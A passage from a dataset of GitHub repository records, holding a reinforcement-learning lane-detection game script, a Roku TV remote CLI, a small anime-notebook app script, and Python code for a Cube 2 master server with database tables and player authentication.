mask)\n #Basically the accumulation of the most imperfect edges with the minimum\n #length being defined by 180\n #Thickness of the lines is 5\n lines = cv2.HoughLinesP(croppedImg, 1, np.pi/180, 180, np.array([]), 180, 5)\n #Now we need to find the slope, intercept and length of each of our detected lines\n left_lines = []\n length_left = []\n right_lines = []\n length_right = []\n #We may not always detect a line that is why we do try/except statement\n try:\n for line in lines:\n #Coordinates of a single line\n for x1, y1, x2, y2 in line:\n #We dont want a vertical line or a horizontal line\n if x1==x2 or y1==y2:\n continue\n #Slope formula\n slope = (y2-y1)/(x2-x1)\n #Intercept\n intercept = y1 - slope*x1\n #Length\n length = np.sqrt((y2-y1)**2+(x2-x1)**2)\n #Y is reversed in images therefore a negative slope is a left line not right\n if slope<0:\n left_lines.append((slope, intercept))\n length_left.append((length))\n else:\n right_lines.append((slope, intercept))\n length_right.append((length))\n #Now we have collected our similar lines into right and left lists\n #Now we can convert them into lanes by dot product all the similar lines with lengths\n #The longer lines are weighted more therefore affect the lanes more\n #Then we normalise them by dividing by sum of the lengths(sort of like averaginng)\n left_lane = np.dot(length_left, left_lines) /np.sum(length_left) if len(length_left) >0 else None\n right_lane = np.dot(length_right, right_lines)/np.sum(length_right) if len(length_right)>0 else None\n #Now we have the right LANE and the left LANE through averaging and dot product\n #Now we need to convert them back into coordinates for pixel points\n #Having an equation of a line (assume infinite) we can select arbitrary points and find\n #the x or y value accordingly.\n #So we select arbitrary points for y1 = croppedImg.shape[0]\n #and for y2 = y1*0.6\n #We all need them to be int so cv2.line can use them\n LeftX1 = int((croppedImg.shape[0] - left_lane[1])/left_lane[0])\n LeftX2 = int(((croppedImg.shape[0]*0.6) - left_lane[1])/left_lane[0])\n RightX1 = int((croppedImg.shape[0] - right_lane[1])/right_lane[0])\n RightX2 = int(((croppedImg.shape[0]*0.6) - right_lane[1])/right_lane[0])\n left_lane = ((LeftX1, int(croppedImg.shape[0])), (LeftX2, int(croppedImg.shape[0]*0.6)))\n right_lane = ((RightX1, int(croppedImg.shape[0])), (RightX2, int(croppedImg.shape[0]*0.6)))\n #Now we can draw them on the image\n #We first create an empty array like our original image\n #Then we draw the lines on the empty image and finally combine with our original image\n emptImg = np.zeros_like(OrgImage)\n #[255, 0, 0,]is the color, 20 is the thickness\n #The star allows us to input a tuple (it processes as integer points)\n cv2.line(emptImg, *left_lane, [255, 0, 0], 20)\n cv2.line(emptImg, *right_lane, [255, 0, ], 20)\n #Finally we combine the two images\n #It calculates the weighted sum of two arrays\n #1.0 is the weight of our original image, we don't want to amplify it\n #0.95 is the weight of our lines, we don't set it to 1 because we don't want it to\n #be very significant in the image, just enough so we can see it and not obstruct anything else\n finalImg = cv2.addWeighted(OrgImage, 1.0, emptImg, 0.95, 0.0)\n except:\n errors = True\n print(\"Nothing detected\")\n #If we dont detect anything or to avoid errors we simply return the original image\n return OrgImage, errors\n #If all goes well, we return the image with the detected lanes\n return finalImg, errors\n\n#Processes the images and returns the 
required data\ndef getFrames():\n #We initialise the mss screenshot library\n sct = mss.mss()\n #This essentially takes a screenshot of the square from the coordinates\n #You can adjust these to your liking, \n game = {'top': 122, 'left': 0, 'width': 512, 'height': 286}\n #This converts the screenshot into a numpy array\n gameImg = np.array(sct.grab(game))\n #We want to resize the array so we can easily display it\n gameImg = cv2.resize(gameImg, (600, 400))\n #We pass the array into our calculateLanes function\n #it returns our detected lanes image as well as if any errors were produced\n img, errors = CalculateLanes(gameImg)\n #You can show the render if you want with the lanes detections\n cv2.imshow('window', img)\n #To further process the image we convert it to a grayscale\n img = cv2.cvtColor(cv2.resize(img, (84, 84)), cv2.COLOR_BGR2GRAY)\n #In order for Keras to accept data we reshape it into the specific format\n #I want to use an image thats 84x84\n img = img.reshape(1, 84, 84)\n #In order to give the algorithm the feel of the \"velocity\" we stack the 4 images\n input_img = np.stack((img, img, img, img), axis = 3)\n #This is required for openCV as a failsafe for stopping render\n #By pressing q, you can stop render\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n #If all goes well we return the input_img and the errors\n return input_img, errors\n\n#This function makes the car accelerate\ndef straight():\n p.keyDown(\"up\")\n p.keyUp(\"right\")\n p.keyUp(\"left\")\n p.keyUp(\"up\")\n\n#We can turn right with this\ndef right():\n p.keyDown(\"right\")\n p.keyUp(\"right\")\n\n#Turn left with this\ndef left():\n p.keyDown(\"left\")\n p.keyUp(\"left\")\n\n\n#For now we make the car accelerate, turn right and turn left\nmoves = 3\n#learning rate (discount rate)\nlearningRate = 0.9\n#This is the exploration rate (epsilon)\n#Its better at first to let the model try everything\nepsilon = 1.0\n#We don't want our model to stop exploring so we set a minimum epsilon\nepsilon_min = 0.01\n#We also dont want our model to explore all the time therefore we want it\n#to decay\nepsilon_decay = 0.995\n#Number of times we want to train the algorithm\nepochs = 100\n#We want to store our data for replay/so our model can remember\nmemory = []\n#The max amount of stuff we want to remember\nmax_memory = 500\n\n#Lets start defining our model\nmodel = Sequential()\n#We will be using a CNN with 32 filters, 3x3 kernel and the input shape will be\n#84x84 with 4 grayscale images stacked on top\n#padding will be set as same and we will use the rectified activation function\nmodel.add(Conv2D(32, (3, 3), input_shape=(84, 84, 4), padding='same',\n activation='relu'))\n#This time we will use 64 filters with a 3x3 kernel, with the same act function \n#but the padding will change\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='valid'))\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='valid'))\n#We flatten our data in order to feed it through the dense(output) layer\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='relu'))\n#We have 3 outputs, forward, left, right\nmodel.add(Dense(3, activation='linear'))\n#We will be using the mean squared error\nmodel.compile(loss='mean_squared_error',\n optimizer=SGD())\n#loop over the number of epochs (essentially the number of games)\nfor i in range(epochs):\n time.sleep(5)\n #We set the game_over to false as the game is just starting\n game_over = False\n #We start of by getting initial frames and errors\n input_img, errors = 
getFrames()\n #We set the errors to false to begin with\n errors = False\n #We set the reward to 0\n reward = 0\n #While the game is not over we loop\n while game_over==False:\n #Np.random.rand() returns a number between 0 and 1\n #We check if its smaller that our exploration factor\n if np.random.rand() <= epsilon:\n #if the random number is smaller than our exploration factor\n #We select a random action from our 3 actions\n action = np.random.randint(0, moves, size=1)[0]\n else:\n #If it's not smaller than we predict an output by inputting our\n #4 stacked images\n #ouput is the probability of our 3 directions\n output = model.predict(input_img)\n #action is the index of the highest probability and therefore\n #indicates which turn to take\n action = np.argmax(output[0])\n #if our action == 0 then we go straight \n if int(action) == 0:\n straight()\n #If our action == 1 then we go right\n elif int(action) == 1:\n right()\n #else we go left\n else:\n left()\n #Once we've performed our action we get the next frame\n #We also check weather to reward the algorithm or not\n input_next_img, errors = getFrames()\n #If we detect lanes and therefore no errors occur we reward the algorithm\n if errors == False:\n reward = reward + 1\n #Else if there we detect no lanes and so there is an error we \n #say its game over\n else:\n game_over = True\n #Game over or not we want to keep record of the steps the algo took\n #We first check if the total memoery length is bigger than the max memory\n if len(memory) >= max_memory:\n #If more memory then needed we delete the first ever element we added\n del memory[0]\n #We append it to our memory list\n memory.append((input_img, action, reward, input_next_img, game_over))\n #Next we set our input_img to our latest data\n input_img = input_next_img\n if game_over:\n print(\"Game: {}/{}, Total Reward: {}\".format(i, epochs, reward))\n #Once the game is over we want to train our algo with the data we just collected\n #We check if our memory length is bigger than our batch size \n if len(memory) > 32:\n #If so then we set the batch_size to 32\n batch_size = 32\n else:\n #Else we set our batch size to whatever is in the memory\n batch_size = len(memory)\n #We are taking a random sample of 32 so not to overfit our algo\n batch = random.sample(memory, batch_size)\n #We itereate over every memory we've stored in that memory batch of 32\n for input_img, action, reward, input_next_img, game_over in batch:\n #if in that memory our game was over then we set the target_reward equal to reward\n target_reward = reward\n #If our game was not over\n if game_over == False:\n #This essentially is the bellman equation\n #expected long-term reward for a given action is equal to the \n #immediate reward from the current action combined with the expected \n #reward from the best future action taken at the following state.\n #The model isn't certain that for that specific action it will get the best reward\n #It's based on probability of the action, if the probability of that action is in the\n #negatives then our future reward is going to be further decreased by our learning rate\n #This is just the model being cautious, as to not set an impossible reward target\n #If the reward is impossible then the algorithm might not converge\n #Converge as in a stable condition where it can play the game without messing up\n target_reward = reward + learningRate * \\\n np.amax(model.predict(input_next_img)[0])\n #So from above we essentially know what is going to happen(input_next_img) \n 
#assuming the game wasn't over, the algorithm did well.\n #So we want the algorithm to perform the same, essentially we\n #persuade the algorithm to do what it did to get that reward\n #so we make the algorithm predict from the previous frame(input_img)\n #but we alter its prediction according to the action that got the highest\n #reward and...\n desired_target = model.predict(input_img)\n #we set that as the target_reward...\n desired_target[0][action] = target_reward\n #So to make the algo perform the same, we associate the input_img with the\n #target we want and we fit it\n model.fit(input_img, desired_target, epochs=1, verbose=0)\n #Finally we check if our exploration factor is bigger than our minimum exploration\n #if so we decrease it by the decay to reduce exploration, we do this every game\n if epsilon > epsilon_min:\n epsilon *= epsilon_decay\n \n" } ]
2
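The training script embedded in the record above explains epsilon-greedy action selection, an experience-replay memory, and a Bellman target in its comments. A minimal, self-contained sketch of that replay update follows; it uses a plain NumPy Q-table instead of the Keras CNN, and the names q_table, n_states, remember and replay are illustrative stand-ins, not identifiers from the original script. Note that the script reuses the name learningRate for what is effectively the discount factor; the sketch keeps that convention under the name discount.

# Minimal sketch of the experience-replay update described in the comments above,
# assuming a tabular Q-function so the example stays self-contained.
import random
import numpy as np

n_states, n_actions = 5, 3
discount = 0.9                      # the script above calls this "learningRate"
q_table = np.zeros((n_states, n_actions))

memory, max_memory = [], 500

def remember(state, action, reward, next_state, game_over):
    # Drop the oldest transition once the buffer is full, as the script does.
    if len(memory) >= max_memory:
        del memory[0]
    memory.append((state, action, reward, next_state, game_over))

def replay(batch_size=32):
    # Train on a random sample of stored transitions rather than only the
    # most recent frames.
    batch = random.sample(memory, min(batch_size, len(memory)))
    for state, action, reward, next_state, game_over in batch:
        target = reward
        if not game_over:
            # Bellman target: immediate reward plus discounted best future value.
            target = reward + discount * np.max(q_table[next_state])
        q_table[state, action] = target

# Tiny usage example with made-up transitions.
remember(0, 1, 1.0, 1, False)
remember(1, 2, -1.0, 2, True)
replay()
print(q_table)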
dcantor/roku
https://github.com/dcantor/roku
a94f13fae6e17717407d11c6a65dd34515a035aa
603e92903ad9f082e4f1460706fd20aae0ef127c
1ba6e6f9269daf00977addc3a60977a67210732b
refs/heads/master
2021-05-02T15:45:10.977084
2018-02-08T04:55:22
2018-02-08T04:55:22
120,702,845
1
0
null
2018-02-08T03:00:34
2018-02-08T03:14:24
2018-02-08T04:55:22
Python
[ { "alpha_fraction": 0.49655452370643616, "alphanum_fraction": 0.5261451005935669, "avg_line_length": 21.824073791503906, "blob_id": "1d7211158a57692cc4582ac9c3b1d71463d15c25", "content_id": "883fe6239cf16d8c5401f0e1e2e79df850ce8b5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2467, "license_type": "no_license", "max_line_length": 79, "num_lines": 108, "path": "/testing/roku-cli.py", "repo_name": "dcantor/roku", "src_encoding": "UTF-8", "text": "import requests\nfrom xml.dom import minidom\n\n\"\"\"This has been tested on a TCL Roku based TV. \nRoku API is here: https://sdkdocs.roku.com/display/sdkdoc/External+Control+API\n\"\"\"\n\nroku_ip = \"192.168.50.70\"\nroku_url = 'http://' + roku_ip + ':8060'\n\n\ndef main():\n ask_user()\n\n\ndef ask_user():\n global action\n\n print \"########################################\"\n print \"Daddy and Elliott's special Roku Remote\"\n print \"########################################\"\n print \"\\n\"\n print \"Menu:\"\n print \"\\n\"\n print \"1. Turn TV On\"\n print \"2. Turn TV Off\"\n print \"3. NBC\"\n print \"4. ABC\"\n print \"5. CBS\"\n print \"6. FOX\"\n print \"7. Netflix\"\n print \"8. Hulu\"\n print \"9. YouTube\"\n print \"80. List all Roku Apps Installed\"\n print \"99. Quit\"\n\n action = raw_input('Enter your selection:\\n')\n\n perform_action()\n\n\ndef perform_action():\n exit_status = 0\n\n while (exit_status < 1):\n\n if action == \"1\":\n r = requests.post(roku_url + '/keypress/PowerOn')\n exit_status = 1\n\n elif action == \"2\":\n r = requests.post(roku_url + '/keypress/PowerOff')\n exit_status = 1\n\n elif action == \"3\":\n r = requests.post(roku_url + '/launch/tvinput.dtv?ch=4.1')\n exit_status = 1\n\n elif action == \"4\":\n r = requests.post(roku_url + '/launch/tvinput.dtv?ch=6.1')\n exit_status = 1\n\n elif action == \"5\":\n r = requests.post(roku_url + '/launch/tvinput.dtv?ch=10.1')\n exit_status = 1\n\n elif action == \"6\":\n r = requests.post(roku_url + '/launch/tvinput.dtv?ch=28.1')\n exit_status = 1\n\n elif action == \"7\":\n r = requests.post(roku_url + '/launch/12')\n exit_status = 1\n\n elif action == \"8\":\n r = requests.post(roku_url + '/launch/2285')\n exit_status = 1\n\n elif action == \"9\":\n r = requests.post(roku_url + '/launch/837')\n exit_status = 1\n\n elif action == \"80\":\n r = requests.get(roku_url + '/query/apps')\n\n mydoc = minidom.parseString(r.content)\n items = mydoc.getElementsByTagName('app')\n\n # Print all Roku Apps\n print('\\nRoku Apps Installed:')\n for elem in items:\n print(elem.firstChild.data)\n\n print \"\\n\"\n\n exit_status = 1\n\n elif action == \"99\":\n exit(0)\n\n else:\n print \"Invalid option. 
Try again \\n\"\n exit_status = 1\n\n main()\n\nif __name__ == \"__main__\":\n main()\n\n\n" }, { "alpha_fraction": 0.6941580772399902, "alphanum_fraction": 0.7422680258750916, "avg_line_length": 19.85714340209961, "blob_id": "9f862bc63c37479d0869b09a8fd191f7ca239a7e", "content_id": "f97cd156321accbacbb927ee04366291c5359a2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "no_license", "max_line_length": 56, "num_lines": 14, "path": "/testing/list-channels.py", "repo_name": "dcantor/roku", "src_encoding": "UTF-8", "text": "from xml.dom import minidom\nimport requests\n\n\n\nr = requests.get('http://192.168.50.70:8060/query/apps')\nmydoc = minidom.parseString(r.content)\nprint mydoc\nitems = mydoc.getElementsByTagName('app')\n\n# all items data\nprint('\\nAll item data:')\nfor elem in items:\n print(elem.firstChild.data)" } ]
2
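The roku-cli.py and list-channels.py files above drive a TV through the Roku External Control API: plain HTTP POSTs to port 8060 for key presses and channel launches, and a GET on /query/apps parsed with minidom. Below is a rough Python 3 equivalent of those same calls (the originals are Python 2); the device address is a placeholder and only endpoints that already appear in the scripts are used.

# Python 3 sketch of the Roku HTTP calls used in roku-cli.py above.
import requests
from xml.dom import minidom

ROKU_IP = "192.168.50.70"          # replace with your device's address
BASE = f"http://{ROKU_IP}:8060"

def keypress(key):
    # e.g. keypress("PowerOn") or keypress("PowerOff")
    requests.post(f"{BASE}/keypress/{key}", timeout=5)

def launch(app_id):
    # e.g. launch("12"), the channel id used for Netflix in the script above
    requests.post(f"{BASE}/launch/{app_id}", timeout=5)

def list_apps():
    # Query installed channels and return their display names.
    r = requests.get(f"{BASE}/query/apps", timeout=5)
    doc = minidom.parseString(r.content)
    return [el.firstChild.data for el in doc.getElementsByTagName("app")]

if __name__ == "__main__":
    print("\n".join(list_apps()))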
Hasv07/Anime_Notebook
https://github.com/Hasv07/Anime_Notebook
c765a615c49d7db35dd1523d31ccade676ae8764
baf5c52b6bbe31ac50626b9c2b238db0921001d0
8fe08a629d9037f4ce14d58166e8a181a012f01a
refs/heads/master
2023-01-28T13:41:11.522112
2020-12-03T18:58:57
2020-12-03T18:58:57
318,287,636
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8365384340286255, "alphanum_fraction": 0.8365384340286255, "avg_line_length": 33.66666793823242, "blob_id": "c65e77be2103b6a8db648b7161b4860b85c6941e", "content_id": "f388e101be121e3ce9aae316dbc7b601f1c219c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 104, "license_type": "no_license", "max_line_length": 86, "num_lines": 3, "path": "/README.md", "repo_name": "Hasv07/Anime_Notebook", "src_encoding": "UTF-8", "text": "#Anime_Notebook\n\nMobile Application which you can add your Favourite Anime Information,Trailer And AMVs\n" }, { "alpha_fraction": 0.6403940916061401, "alphanum_fraction": 0.6453201770782471, "avg_line_length": 24.5, "blob_id": "22d11466e64d632b95713e8255f5539e9b9c9836", "content_id": "39768caac498a276aaf31bb0062c613ce12c5916", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 203, "license_type": "no_license", "max_line_length": 40, "num_lines": 8, "path": "/assets/json/with.py", "repo_name": "Hasv07/Anime_Notebook", "src_encoding": "UTF-8", "text": "import json\nnames=[]\nwith open(\"anime.json\",'r') as handle:\n x= json.load(handle)\n names = [data['name'] for data in x]\nwith open(\"anime.json\",'w+') as handle:\n\n json.dump(names,handle,indent=4)" } ]
2
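For reference, a small non-destructive variant of the name-extraction step performed by with.py above: it writes the extracted names to a separate file instead of overwriting anime.json in place. The output file name is illustrative.

# Read the anime entries, pull out the names, and save them alongside the original.
import json

with open("anime.json", "r") as handle:
    entries = json.load(handle)

names = [entry["name"] for entry in entries]

with open("anime_names.json", "w") as handle:
    json.dump(names, handle, indent=4)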
MorganBorman/pyCube2Master
https://github.com/MorganBorman/pyCube2Master
e3b1fdfd0b940f43c137d7563b0c4fd9b07edf31
29105f1e0822f24f8cc4c84537c8c79aa5594d0e
121d0d74f7f40c341c025272c4afdbf322c739ce
refs/heads/master
2016-09-05T09:03:19.587579
2012-07-08T08:57:51
2012-07-08T08:57:51
4,027,356
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6382730603218079, "alphanum_fraction": 0.6394398808479309, "avg_line_length": 29.625, "blob_id": "129ef7b8842737dfaf278a2cd25e6cf821604498", "content_id": "4031563707867df671578a2ca90f6d006f28e237", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1714, "license_type": "no_license", "max_line_length": 115, "num_lines": 56, "path": "/src/DatabaseManager.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "import CategoryConfig, sqlalchemy\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom contextlib import contextmanager\n\ndef get_database_uri():\n config_path = \"../\"\n config_category = \"database\"\n config_extension = \".conf\"\n \n config_object = CategoryConfig.CategoryConfig(config_path, config_category, config_extension)\n \n #place the database by default in the instances directory\n default_db_path = \"sqlite:///../pyCube2Master.db\"\n \n doc = 'Sqlalchemy uri string indicating the database connection parameters.'\n return config_object.getOption('database.uri', default_db_path, doc)\n\n\nclass DatabaseManager():\n def __init__(self):\n self.is_connected = False\n self.uri = get_database_uri()\n self.engine = None\n self.session_factory = None\n self.Base = declarative_base()\n \n def connect(self):\n if not self.is_connected:\n self.engine = sqlalchemy.create_engine(self.uri)\n self.session_factory = sqlalchemy.orm.sessionmaker(bind=self.engine, autocommit=False, autoflush=False)\n self.is_connected = True\n \n def initialize_tables(self):\n self.connect()\n self.Base.metadata.create_all(self.engine)\n \n def get_session(self):\n try:\n self.engine.execute(\"SELECT 1;\")\n except:\n del self.session_factory\n del self.engine\n self.is_connected = False\n self.connect()\n\n return self.session_factory()\n \ndatabase_manager = DatabaseManager()\n\n@contextmanager\ndef Session():\n session = database_manager.get_session()\n try:\n yield session\n finally:\n session.close()" }, { "alpha_fraction": 0.6293706297874451, "alphanum_fraction": 0.6293706297874451, "avg_line_length": 46.733333587646484, "blob_id": "8c5077568e909534a9b743f0206c7f2fd4493ed8", "content_id": "287106dfe822f4cf45c2a09d1538ea9136b93ce2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 715, "license_type": "no_license", "max_line_length": 98, "num_lines": 15, "path": "/src/BaseTables/CaptureEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass CaptureEvent(database_manager.Base):\n __tablename__ = table_names['CaptureEvent']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n who = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n \n start = Column(DateTime, nullable=False)\n end = Column(DateTime, nullable=False)\n team = Column(SmallInteger, nullable=True)\n complete = Column(Boolean, nullable=False)\n health = Column(Integer, nullable=False)" }, { "alpha_fraction": 0.7108433842658997, "alphanum_fraction": 0.7831325531005859, "avg_line_length": 26.33333396911621, "blob_id": "040bdbb8f8618e7ae3036a086fa6a8ae1c589fb9", "content_id": "c91e4c397d9c89722a33255b4cdc6e43ed350c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 83, 
"license_type": "no_license", "max_line_length": 46, "num_lines": 3, "path": "/src/main.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "\nfrom Controller import Controller\n\ncontroller = Controller('localhost', 28787, 5)\n" }, { "alpha_fraction": 0.5101317167282104, "alphanum_fraction": 0.5126646161079407, "avg_line_length": 28, "blob_id": "00af7f300327fef304ab4a40069192157c2147fc", "content_id": "d22a0835f6705f8990d7aa8bc73ae0bba5531108", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1974, "license_type": "no_license", "max_line_length": 98, "num_lines": 68, "path": "/src/AuthenticationModel.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Signals import SignalObject, Signal\n\nimport random\nimport cube2crypto\n\nfrom BaseTables import User, UserName\n\nclass AuthenticationModel(SignalObject):\n\n challenge = Signal\n accept = Signal\n deny = Signal\n\n def __init__(self):\n SignalObject.__init__(self)\n \n #key = (client, authid)\n #value = {'user': user, 'answer': answer}\n self.pending_auths = {}\n \n self.name_list = \"\"\n self.name_list_dirty = True\n \n def request_authentication(self, client, authid, email):\n \n user = User.by_email(email)\n \n if user is None:\n self.deny(authid)\n return\n \n pubkey = user.pubkey\n \n challenge, answer = cube2crypto.genchallenge(pubkey, format(random.getrandbits(128), 'X'))\n \n self.pending_auths[(client, authid)] = {'user': user, 'answer': answer}\n \n self.challenge.emit(client, authid, challenge)\n \n def confirm_authentication(self, client, authid, answer):\n \n if not (client, authid) in self.pending_auths.keys():\n self.deny.emait(client, authid)\n return\n \n pending_auth = self.pending_auths[(client, authid)]\n user = pending_auth['user']\n \n if answer != pending_auth['answer']:\n self.deny.emait(client, authid)\n else:\n self.accept.emit(client, \n authid, \n user.id, \n user.group_list,\n user.name_list)\n \n def get_name_list(self):\n if self.name_list_dirty:\n name_list_list = []\n \n for name in UserName.all_names():\n name_list_list.append(\"na %s\\n\" % name)\n \n self.name_list = \"\".join(name_list_list)\n self.name_list_dirty = False\n \n return self.name_list\n\n\n" }, { "alpha_fraction": 0.5946816802024841, "alphanum_fraction": 0.5954875349998474, "avg_line_length": 43.28571319580078, "blob_id": "feed7b364718bc9948b52763dbf262a7c7dd05dc", "content_id": "a245d577c0db89efdc154deb401a76c05c96cd6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1241, "license_type": "no_license", "max_line_length": 62, "num_lines": 28, "path": "/src/BaseTables/TableNames.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "prefix = \"pycube2master_\"\n\ntable_names = {}\n\ntable_names['ActivitySpan'] = 'activity_spans'\ntable_names['CaptureEvent'] = 'capture_events'\ntable_names['DamageDealtEvent'] = 'damage_dealt_events'\ntable_names['DeathEvent'] = 'death_events'\ntable_names['FragEvent'] = 'frag_events'\ntable_names['Game'] = 'games'\ntable_names['GameVersion'] = 'game_versions'\ntable_names['Gun'] = 'guns'\ntable_names['Match'] = 'matches'\ntable_names['Mode'] = 'modes'\ntable_names['PseudoMode'] = 'pseudo_modes'\ntable_names['PunitiveEffect'] = 'punitive_effects'\ntable_names['PunitiveEffectType'] = 'punitive_effect_types'\ntable_names['ServerDomain'] = 'server_domains'\ntable_names['ServerInstance'] = 
'server_instances'\ntable_names['ServerMod'] = 'server_mods'\ntable_names['ShotEvent'] = 'shot_events'\ntable_names['User'] = 'users'\ntable_names['UserGroup'] = 'user_groups'\ntable_names['UserGroupMembership'] = 'user_group_memberships'\ntable_names['UserName'] = 'user_names'\n\nfor key in table_names.keys():\n table_names[key] = prefix + table_names[key]\n\n" }, { "alpha_fraction": 0.5666462182998657, "alphanum_fraction": 0.5684889554977417, "avg_line_length": 30.60194206237793, "blob_id": "b64acf8ad2e6930e571121c4515c26e089efc43e", "content_id": "1d920c98e31b9b3e244a1de1c0dc80a9c1838d25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3256, "license_type": "no_license", "max_line_length": 124, "num_lines": 103, "path": "/src/ServersModel.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "\"\"\"Represents the body of the server list data.\"\"\"\n\nfrom Signals import SignalObject, Signal\nimport time\nimport cube2crypto\nimport random\n\nfrom BaseTables import ServerDomain, ServerInstance\n\nclass ServersModel(SignalObject):\n\n challenge = Signal\n accept = Signal\n deny = Signal\n\n def __init__(self):\n SignalObject.__init__(self)\n \n self.server_list = \"\"\n self.server_list_dirty = True\n \n #key = client\n #value = (port, time, server_domain, answer)\n self.servers_pending = {}\n \n #key = client\n #value = (port, time, server_domain)\n self.servers = {}\n \n def register_server(self, client, server_domain, port):\n \"Attempt to register a newly connected server_domain.\"\n \n if client in self.servers.keys():\n self.servers[client]['time'] = time.time()\n return\n \n server_domain = ServerDomain.by_domain(server_domain)\n \n if server_domain is None:\n self.deny.emit(client)\n return\n \n pubkey = server_domain.pubkey\n \n challenge, answer = cube2crypto.genchallenge(pubkey, format(random.getrandbits(128), 'X'))\n \n self.servers_pending[client] = {'port': port, 'time': time.time(), 'server_domain': server_domain, 'answer': answer}\n \n self.challenge.emit(client, challenge)\n \n def confirm_server(self, client, answer):\n \"Confirm a connected servers authentication.\"\n if not client in self.servers_pending.keys():\n self.deny.emit(client)\n return\n \n data = self.servers_pending[client]\n del self.servers_pending[client]\n \n if data['answer'] != answer:\n self.deny.emit(client)\n return\n \n del data['answer']\n \n self.servers[client] = data\n self.server_list_dirty = True\n self.accept.emit(client)\n \n def is_server_confirmed(self, client):\n \"Check whether the specified server has been confirmed.\"\n return client in self.servers.keys()\n \n def remove_server(self, client):\n \"Removed the specified server from the list.\"\n if client in self.servers.keys():\n del self.servers[client]\n self.server_list_dirty = True\n \n if client in self.servers_pending.keys():\n del self.servers_pending[client]\n \n def refresh(self):\n \"Look for servers which have timed out.\"\n pass\n \n def get_server_list(self):\n \"Get the current list of servers.\"\n if self.server_list_dirty:\n server_list_list = []\n for client, data in self.servers.items():\n server_ip = client.address[0]\n server_port = data['port']\n server_list_list.append(\"addserver %s %s\\n\" %(server_ip, server_port))\n self.server_list = \"\".join(server_list_list)\n self.server_list_dirty = False\n \n return self.server_list\n \n def broadcast(self, data):\n \"Send a message to all confirmed servers.\"\n for client in 
self.servers.keys():\n client.send(data)\n\n" }, { "alpha_fraction": 0.8787878751754761, "alphanum_fraction": 0.8787878751754761, "avg_line_length": 30.719999313354492, "blob_id": "d762bc06529f1cf47560f27f242578827cc42258", "content_id": "e744c84d624f3605228fd84f5438333d83aff894", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 792, "license_type": "no_license", "max_line_length": 51, "num_lines": 25, "path": "/src/BaseTables/__init__.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import database_manager\n\nfrom User import User\nfrom UserGroup import UserGroup\nfrom UserName import UserName\nfrom UserGroupMembership import UserGroupMembership\nfrom ActivitySpan import ActivitySpan\nfrom CaptureEvent import CaptureEvent\nfrom DamageDealtEvent import DamageDealtEvent\nfrom DeathEvent import DeathEvent\nfrom FragEvent import FragEvent\nfrom Game import Game\nfrom GameVersion import GameVersion\nfrom Gun import Gun\nfrom Match import Match\nfrom Mode import Mode\nfrom PseudoMode import PseudoMode\nfrom PunitiveEffectType import PunitiveEffectType\nfrom PunitiveEffect import PunitiveEffect\nfrom ServerDomain import ServerDomain\nfrom ServerInstance import ServerInstance\nfrom ServerMod import ServerMod\nfrom ShotEvent import ShotEvent\n\ndatabase_manager.initialize_tables()" }, { "alpha_fraction": 0.6492146849632263, "alphanum_fraction": 0.6492146849632263, "avg_line_length": 46.83333206176758, "blob_id": "512347b364335ecac096987c88ed5cb439d9726f", "content_id": "b44909d2e43e3de34503c1ccb9a92646d1a344fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 573, "license_type": "no_license", "max_line_length": 98, "num_lines": 12, "path": "/src/BaseTables/ShotEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass ShotEvent(database_manager.Base):\n __tablename__ = table_names['ShotEvent']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n who = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n gun = Column(SmallInteger, ForeignKey(table_names['Gun']+'.id'), nullable=False)\n \n when = Column(DateTime, nullable=False)" }, { "alpha_fraction": 0.5693683624267578, "alphanum_fraction": 0.5721065998077393, "avg_line_length": 34.74509811401367, "blob_id": "7b7b9a317a338b6decfd35f1bcd50cc994c92e81", "content_id": "0a3df7c6950cbf29075ba2e5a078412431dfdf56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5478, "license_type": "no_license", "max_line_length": 98, "num_lines": 153, "path": "/src/Controller.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from AuthenticationModel import AuthenticationModel\nfrom 